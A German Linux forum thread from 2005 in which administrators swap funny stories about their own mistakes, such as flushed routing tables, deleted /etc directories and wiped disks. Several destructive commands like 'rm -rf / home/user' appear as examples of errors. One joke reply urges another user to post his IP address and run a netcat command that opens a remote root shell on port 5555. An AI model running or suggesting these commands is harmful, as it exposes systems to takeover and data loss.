Eure derbsten Admin Erlebnisse

Dieses Thema im Forum "Fun" wurde erstellt von tr0nix, 19.01.2005.

  1. tr0nix

    tr0nix der-mit-dem-tux-tanzt

    Dabei seit:
    11.07.2003
    Beiträge:
    1.585
    Zustimmungen:
    0
    Ort:
    Schweiz, Opfikon/Glattbrugg
    Hallo zusammen

    Haben wir schon so einen Thread? Ich frag mal zuerst bevor ich anfange zu posten :)!

    Also so lustige Adminerlebnisse wie Kollegen die remote "route -f" (Routingtable flushen) auf Servern die 10km entfernt stehen ausfuehren etc.

    Grutz
    Joel
     
  2. Anzeige

    Schau dir mal diese Kategorie an. Dort findest du bestimmt etwas.
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren
  3. devilz

    devilz Pro*phet
    Administrator

    Dabei seit:
    01.05.2002
    Beiträge:
    12.244
    Zustimmungen:
    0
    Ort:
    Hessen
    Hey, ich selber hab schon ein "rm -rf /etc/" gebracht *g*

    PS : Nein den Thread gibts afaik nicht :)
     
  4. #3 Cyber, 19.01.2005
    Zuletzt bearbeitet: 19.01.2005
    Cyber

    Cyber .:DISTORTED:.

    Dabei seit:
    16.05.2003
    Beiträge:
    999
    Zustimmungen:
    0
    Ort:
    D -> BW -> Karlsruhe
    Mehrere shells und remote-shells offen, eine davon ne aufm server um ne datenbank aufzudaten. Wollte nen Arbeitplatz neu starten und hab den init 0 auf server abgesetzt.

    //EDIT:
    Da war nochwas :)

    Hab mal beim Backup des Systems die Partition geschrottet, weil ich anstelle von "tar -cvf /dev/rmt/0 ." ein "tar -xvf /dev/rmt/0" gemacht hatte und auf dem scheiss Band auch noch was drauf war. Danach war ne Neu-Installation fällig. Natürlich auch der Server. X(
     
  5. #4 Lord Kefir, 19.01.2005
    Lord Kefir

    Lord Kefir König

    Dabei seit:
    10.06.2004
    Beiträge:
    944
    Zustimmungen:
    0
    Ich habe letztens zum ersten Mal ein Linuxsystem komplett geschrottet. Wollte per Cronjob die Dateien in einem bestimmten Verzeichnis regelmäßig löschen lassen, die älter als eine Woche sind. Das ganze hab' ich natürlich mit 'find' gemacht...

    Fragt mich nicht warum, aber bei dem exec-Kommando ist irgendwie ein * hinter das 'rm' gelangt und mein Script fing an die komplette Platte leerzufegen... ist mir erst aufgefallen, als es eine Fehlermeldung gab, weil irgendein Device nicht gelöscht werden konnte. Das war dann aber recht spät...

    Ist mir immer noch noch ziemlich peinlich :O


    Mfg, Lord Kefir
     
  6. #5 tr0nix, 19.01.2005
    Zuletzt bearbeitet: 19.01.2005
    tr0nix

    tr0nix der-mit-dem-tux-tanzt

    Dabei seit:
    11.07.2003
    Beiträge:
    1.585
    Zustimmungen:
    0
    Ort:
    Schweiz, Opfikon/Glattbrugg
    Ihr kennt doch sicher "killall" unter Linux. Ich hab das mal unter Solaris (als ich frisch angefangen habe mit Solaris) benutzen wollen. Nachdem immer was von wrong argument count kam, wollt ich mir die Syntax des Kommandos unter Solaris anschauen und tippte nur "killall" ein -> entspricht auf Solaris einem "kill -9 0" und Server war down :).

    Was krasses: wir haben 3 Server mit ausgelagerten Volumes auf einem Disk Array. Das Disk-Array wurde so Konfiguriert, dass 3 LUN's (Logische Disks) auf allen 3 Servern sicht- und nutzbar waren. Nun hat man dies angeblich deaktiviert und ich kriegte einen dringenden Auftrag, Filesystemvolumes fuer die Datenbanken zu vergroessern. Diese habe ich auf die Disks die gerade frei waren gelegt - die geshareten Disks :). Da ich Volumes auf allen 3 Servern vergroessern musste, und auf allen die gleichen Disks genutzt habe, hat es immer wieder die Volumeinformationen auf der Disk ueberschrieben. Fazit: mehrere TB auf den Volumen waren inkonsistent. Volumes mussten neu erstellt werden und Daten via Backup draufgeladen werden.

    Sh1t happens :). Lustiger sind meine Kollegen... die haben irgendwie alle schon "route -f" gemacht auf den Maschinen. Aber so bloed war ich selber noch nie *hrhr*.
     
  7. wurmus

    wurmus Tripel-As

    Dabei seit:
    23.02.2004
    Beiträge:
    194
    Zustimmungen:
    0
    Ort:
    Laubach/hessen
    hi
    Also ich habe mal irgendwie den user root gelöscht also damals noch unter SuSE und dann habe ich mal den falschen PC im Linux raum an der Schule ausgeschaltet weil eine Workstation neber einem Server stand und an dem (test)Server waren lauter NIS clients angemeldet. war noch mit ext2 und irgendwie hatte es die Boot Partition zerschossen oder so...

    naja im vergleich zu den Sicherheits richtlinien auf den schuhl Computern ist das (fast) garnix

    wenn man da auf ein Verzeichnis zugreift wo man eigentlich nicht hin sollte kommt ein Fenster mit folgendem Text:

    Dieses Verzeich nis ist für sie gesperrt (oder so ähnlich)

    und unten dann zwei buttons wo man wählen kann "OK" und "Ignorieren"

    wenn man 5 mal "Ignorieren" drückt ist man im verzeich nis mit lese und schreibrechten drinn
    OK ich muss sagen dass das Lehrer waren die da am Windows server Admin spielen....

    Zitat eines Admins "Linux ist scheiße denn es ist viel zu schwer Windows ist soooo einfach da klickt man mal da mal hier und schon leuft der Server [...]"

    naja ich hör dann mal auf zu lästern *g* (obwohl es macht richtig Spaß)

    ~wurm~
     
  8. codc

    codc /dev/null

    Dabei seit:
    12.01.2004
    Beiträge:
    607
    Zustimmungen:
    0
    "rm -rf / home/user"
    fsck auf ein gemountetes Filesystem und Warnungen missachten

    die Klassiker ich weiss war beides zu meinen Anfangszeiten.

    Ach ja letztens "rpm -e rpm" oops wie krieg ich rpm jetzt ohne rpm wieder drauf ....
     
  9. mo_no

    mo_no Linux User seit 2.0.35

    Dabei seit:
    29.09.2004
    Beiträge:
    1.134
    Zustimmungen:
    0
    Ist schon etwas länger her.
    War bei mir am PC.
    Ich wollte den Mountpoint /win löschen und war der Meinung, dass dieser nicht mehr eingehängt war.
    Habe mich schon gewundert, dass es etwas länger gedauert hat.
    Windows und ein paar Daten waren weg! ;-)
    Naja.......

    @ Devilz:
    besser als /etc zu löschen :devil:
     
  10. #9 theborg, 19.01.2005
    theborg

    theborg KBitdefender Programierer

    Dabei seit:
    06.08.2004
    Beiträge:
    688
    Zustimmungen:
    0
    Ort:
    Hamburg
    ich hab mahl auf meinen root ausversehn "cp /proc/kernel /dev/dsp $"gemacht wolte es eigentlich zu hause testen aber net gemerkt das ich auf dem server bin irgentwan nach 2 tagen rief jemand von dem anbiter an und hat mahl gefragt was ich gemacht habe da der rechner so komisch fiept *G*
     
  11. #10 traster, 19.01.2005
    traster

    traster Routinier

    Dabei seit:
    25.11.2003
    Beiträge:
    297
    Zustimmungen:
    0
    ! BITTE DIESEN THREAD STOPPEN !
    ich hab so eine seltsamme art immer alle befehle die auf unixboard aufgefuehrt werden
    bei mir zu testen
    ganz besonders bei den eingaben die ich nicht kenne !
    und das spannende dabei es ist so einfach weil wohl alles als root ablaeuft
    mfg traster
    p.s. ich wechsel jetzt mal schnell in die konsole um zu testen
     
  12. mo_no

    mo_no Linux User seit 2.0.35

    Dabei seit:
    29.09.2004
    Beiträge:
    1.134
    Zustimmungen:
    0
    @ traster
    Sebst dran Schuld! :D
    VIEL SPASS DABEI!
    Und anschließend viel Spass beim Neuaufsetzen des Systems! :devil:
     
  13. codc

    codc /dev/null

    Dabei seit:
    12.01.2004
    Beiträge:
    607
    Zustimmungen:
    0
    Logisch ohne Rootrechte kann man nicht wirklich schaden anrichten :devil:

    Aber er kanns wohl nicht lesen weil er beim neu-aufsetzen ist :headup:
     
  14. #13 qmasterrr, 19.01.2005
    qmasterrr

    qmasterrr Foren Gott

    Dabei seit:
    01.01.2004
    Beiträge:
    2.735
    Zustimmungen:
    0
    Ort:
    Germany/NRW/Wesel
    poste hier mal deine ip, (stell die firewall auf forward port 5555)
    nc -l -p 5555 -e /bin/sh &disown

    dann hast du einen fehler gemacht :)
     
  15. Anzeige

    Vielleicht findest du HIER Antworten.
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren
  16. #14 bananenman, 19.01.2005
    bananenman

    bananenman Routinier

    Dabei seit:
    07.03.2004
    Beiträge:
    410
    Zustimmungen:
    0
    schön ist es auch mal ein mkreiserfs über die 160 gb große und knallvolle backup-platte laufen zu lassen (die ich aus sicherheitsgründen halt immer nur zum backup mounte) - natürlich hatte ich die daten auch noch mal auf tape - jedenfalls die fünf unwichtigsten gb 8) ... . aber hey - war schließlich mein privater server. was auch toll ist: alte kundenserver schrotten - man hängt zum formatieren und zur laufwerksüberprüfung mal eben eine kundenfestplatte in den rechner, der grad auf dem tisch steht (muss schließlich schnell gehen) - alles prima! - und vergisst die plattengeometrie im bios beim einhängen der original-platte wieder zurückzusetzen. bis man gemerkt hat was falsch gelaufen ist, hat sich der nt4-server mit seinen dynamischen laufwerken schon in alle einzelteile zerdreht (schön, wenn man eine klausel für haftungsausschuss im wartungsvertrag hat ...). war allerdings nur halb so schlimm: das voll-backup war grad ein tag alt.

    mfg

    bananenman
     
  17. #15 winequarter, 20.01.2005
    winequarter

    winequarter Jungspund

    Dabei seit:
    25.11.2003
    Beiträge:
    16
    Zustimmungen:
    0
    Ort:
    Wien, Österreich
    Als ich noch arbeiten war:
    Ein netter Kollege mountet unser aller gemeinsames Laufwerk (von einem Win-Rechner) in sein Homeverzeichnis. Natürlich mit administrator-rechten. es hat eine weile gedauert, bis er nach rm -rf daufgekommen ist, dass das Verzeichnis noch gemountet ist.
    Backup? Gibts nicht. Naja. Bin eh nicht mehr in dieser Firma :D
     
Thema:

Eure derbsten Admin Erlebnisse

Die Seite wird geladen...

Eure derbsten Admin Erlebnisse - Ähnliche Themen

  1. Amateure im Kampf mit OS

    Amateure im Kampf mit OS: Laut wiki braucht xubuntu 512 MB Ram. Wie kann dann Xubutu mit 3 GB Ram überlastet sein mit 100% CPU. Ich bin sicher, der Profi Nutzer Linux wird...
  2. Grub2 Problem/eure Erfahrungen damit

    Grub2 Problem/eure Erfahrungen damit: Einen schönen guten. Abend. @all Da nun mein Gentoosystem, bis auf's Wlan, schön läuft wollte ich nun mein lilo bootloader durch grub ersetzen....
  3. eure Meinung zur Update Zeit...

    eure Meinung zur Update Zeit...: Hallo, ich habe ein Script das einen best. Rechner im Netz eine gewisse Zeit ermöglichen soll Updates zu ziehen (Windows7-Rechner) danach wird...
  4. Wie gut lassen sich eure Handys synchronisieren?

    Wie gut lassen sich eure Handys synchronisieren?: Hi, Werde mir demnächst ein neues Handy zulegen. Ich lege dabei ziemlich viel Wert darauf, dass ich das Handy mit dem PC verbinden kann,...
  5. Eure Arduino Erfahrungen/Projekte/Ideen ...

    Eure Arduino Erfahrungen/Projekte/Ideen ...: [IMG] ---------- Arduino is an open-source electronics prototyping platform based on flexible, easy-to-use hardware and software. It's...